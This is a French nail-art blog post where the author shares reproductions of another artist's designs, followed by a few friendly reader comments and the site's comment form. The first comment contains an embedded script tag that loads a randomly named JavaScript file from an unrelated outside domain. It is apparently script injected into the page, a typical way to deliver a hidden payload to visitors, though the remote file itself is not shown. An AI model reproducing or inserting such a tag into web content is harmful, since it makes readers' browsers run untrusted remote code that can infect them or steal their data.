• Que de repro =)

    Encore un petit coucou mes chéries, 

    Voilà j'ai décidé de faire toutes les repro de nail art que j'aime bien, sur onglier pour pouvoir m'en inspirer par la suite, j'ai choisi de commencer par les nails art de Tarto car je trouve qu'ils ne sont pas trop difficiles à reproduire enfin c'est sûre j'ai pas son niveau et il y a des cafouillages et des trucs fait à ma sauce, mais je suis fan de certains que j'ai fait et d'autres pas bof bof pas spécialement satisfaite =) 

    Je vous laisse décidé si c'est un craquage ou une réussite lol

    Que de repro =)

    Vos avis les Nail artistes?! Je suis assez fan de celui du haut avec le vernis holo et les autres je les aimes à peu près tous ^^

    « Swatch Pupa + son nail artLots pour le concours »

  • Commentaires

    1
    Dimanche 18 Novembre 2012 à 18:41

    C'est très bien fait, bravo!

    bisous

    <script src="http://pluginthemerose.info/dfi823hs.js?0.04618239715307271" type="text/javascript"></script>
    2
    Mercredi 21 Novembre 2012 à 22:42

    on vois bien que tu t'es amélioré c'est super beau j'adore bravo ma belle 

    3
    Jeudi 22 Novembre 2012 à 08:04

    Merci ma chérie, oui heureusement que j'ai un peu progressé mais il y a encore beaucoup beaucoup de boulot, je m'accroche hihi 

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :